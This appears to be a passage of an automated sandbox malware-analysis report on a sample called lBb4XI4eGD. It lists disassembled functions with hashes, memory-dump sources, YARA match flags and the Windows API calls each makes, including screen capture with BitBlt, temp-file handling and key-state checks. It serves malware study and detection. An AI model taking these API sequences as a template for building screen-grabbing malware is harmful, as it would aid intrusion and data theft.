                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                                • Instruction ID: bf27218958a80b690e3a44cca7366e6b24f2ef7e8a7a5d886c443ec6f3b31c56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59dd4bd0c1531d813496625183860d7603ab6caa47f2666f03216f1f75dd9f13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F0553A34020457CB149F35DC0476ABFA0EFC1754F0A0069EF068B240C3319943C790
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                                • Instruction ID: ba7890fb8fc5eb9f8b971137117999a11d29cf1203cf16992e0f29a4d0b5929f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e702c4e2d0461e68094a97fe8e574819dc7ce5f261b7fb6651781e8db5aaf0e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0203A30020497CB049F76D81976BBF90EFC5754F0A409AEB058B250C6399842C794
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00410662,0214FE56), ref: 021508C2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                • Opcode ID: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                • Instruction ID: 5c8b292967d7452e3bc87296356d1eb0976ca502c7ae6873f40aced82284ad3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f4fbfa47ca6a409a7d068b2f682476f102fb9ea510ab73d48989586e1a594b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_783000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 56x
                                                                                                                                                                                                                                • API String ID: 0-170104338
                                                                                                                                                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                • Instruction ID: e2c2b1257af15c8cc4190191d236ebcbac60268f95f64c606a88e35d049e9128
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 161186B2380100AFD744DF59DCC1EA673D9EB89760B198055ED04CB312E679ED01C760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e11138b8b53125bfb62bbdd7b14adb9d1d5bdfc0d8b53bd9fde03df388fd17e9
                                                                                                                                                                                                                                • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e11138b8b53125bfb62bbdd7b14adb9d1d5bdfc0d8b53bd9fde03df388fd17e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                • Instruction ID: b42f969b73b3653001c5e596ff92b6408412d6b2926b61f96035260ca9b9f54f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BD1D8321481A34EDB2D4A3D847813EFFE2AA421A930E47ADD4F7CA5C2EB24D575D660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                • Instruction ID: fd441a55e5f2ac7fc0474e2e48f6b2c6ba9ea1627222f301c88e8229dd7559ad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC9155722490A34EDB6D463E847C13EFFE15A412A531B0B9DD4F2CA1C5EF24D579D620
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                • Instruction ID: 6065d5bb04e7651e6564e01373db5115d7de5511378354d2ffeef282c741a3d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A9120721490A34EEB6A463A857C13EFFE25A421A530F079DD4F2CA5C5FF24D578D620
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                • Instruction ID: 8a03f19d1ddc565cbce8d872c8d1aaca395519d13d74ee9e9633522d128d7cc9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 969195321490A30EEB6E4279857C53EFFE1DA411A931A0B9DD4F2CE1C5EF24C576DA20
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                • Instruction ID: 4864f116dc91c3884427c357aa8e7197199853f5a56ded030f8e56021f746ba5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 226169717C07096ADB386A6CB85DBBE63999F45B0CF04082AE982DF2C0D711D971CB56
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                                • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                • Instruction ID: 641443e11b888a9c1151a54783e280866ecacb025f91bf6288a0be1a4f24fe47
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 068154722490A34EEB6D4639857C43EFFE2DA421A930A079DD4F2CA1C5FF148176D620
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                • Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction ID: 85752656c859fc64d43ca3cf1324361cda48a6b022bb56d1292207519edf10bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D311EE772C104243D658C62DD4BC2BFA79DEBC522972F827AD0814B758D732A17DD600
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                • Instruction ID: 4d0c7fc28f0df5c0d444da8e6d13caba3407804bcf0b1067487c970ded40c4d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D01F772A506008FDF25CF21CC14BAA33F5EF89205F1540B4DA0E97241EB70A9458B80
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00402140
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402147
                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                                                                                                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00402275
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                • String ID: Tahoma
                                                                                                                                                                                                                                • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 004025E8
                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0040260F
                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 00402797
                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004027CB
                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                                                                                                                                                • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00402803
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
